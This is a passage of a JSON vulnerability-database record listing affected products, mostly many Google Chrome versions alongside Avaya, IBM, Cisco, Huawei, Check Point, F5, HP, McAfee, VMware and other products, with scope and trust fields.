"chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.69" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "cloud identity manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.13" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.3" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.0.9.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1661.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.30" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.662.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.149" }, { "model": "gaia r75.47", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v8400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.833.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.47" }, { "model": "gaia r71.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.119" }, { "model": "vcenter hyperic server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "privileged identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.2" }, { "model": "vcenter operations manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.810.0" }, { "model": "ipso r75.40vs", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "gaia ngx r65", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.23" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.41" }, { "model": "system storage san40b-4 2498-b40", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "e6000 chassis v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1681.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.649.0" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.78" }, { "model": "oceanstor s5600t v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.1" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.316.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.9" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.90" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75350" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.692.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.7" }, { "model": "universal small cell cloudbase", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11" }, { "model": "cloudsystem foundation", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.639.0" }, { "model": "wireless lan wos with aos", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "91007.0.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.98" }, { "model": "quantum son suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.630.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.0" }, { "model": "telepresence recording server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.885.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.52" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "ipso r71.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.569.0" }, { "model": "workcentre r15-03 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7755061.090.225.06200" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.962.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.306.0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.295.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.318.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.619.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.14" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.63" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.5.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "t620 flexible quad core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.6" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7835" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1004" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.86" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1033" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.100" }, { "model": "vpn gateway", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3050" }, { "model": "secureplatform r71.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1044" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1679.0" }, { "model": "secureplatform r71.45", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia embedded r71", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7225" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.56" }, { "model": "storeonce backup", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.11.3" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.539.0" }, { "model": "e6000 blade server bh622 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.661.0" }, { "model": "insight control for linux central management", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.91" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.939.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.474.0" }, { "model": "information archive", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.893.1" }, { "model": "audit vault and database firewall", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "vertica", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1-0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.42" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.1" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.883.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.306" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.62" }, { "model": "galax8800 v100r003c10cp6001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.348.0" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.515" }, { "model": "life cycle management", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.62" }, { "model": "t410 smart zero client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.7" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.120" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.935.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.705.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1082.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.122" }, { "model": "application dependency planner", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.395.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1016.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.84" }, { "model": "system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x0" }, { "model": "system storage san768b-2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2499-816" }, { "model": "oceanstor s6800t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1075.0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.33" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.20" }, { "model": "oceanstor uds v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.117" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.16" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.443.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.107" }, { "model": "gaia r70.1", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "secure access core concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.34" }, { "model": "esight network v200r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.18" }, { "model": "videoscape distribution suite transparent caching", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.776.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.96379" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.217" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.40" }, { "model": "9710-e08", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vcenter infrastructure navigator", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1074.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.900.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.75" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.71" }, { "model": "enterprise linux server eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.407.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.892.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.29" }, { "model": "vsphere big data extensions", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.518.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.346.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1658.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.897.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.102" }, { "model": "oceanstor css v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.421.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.56" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.0" }, { "model": "ipso r75.10", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vcenter log insight", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "36.0.1985.143" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.927.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.23" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "storeever esl g3 tape library 671h gs00601", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.10" }, { "model": "nexus switch for nexus series 4.0 n1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v5000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.16" }, { "model": "nac 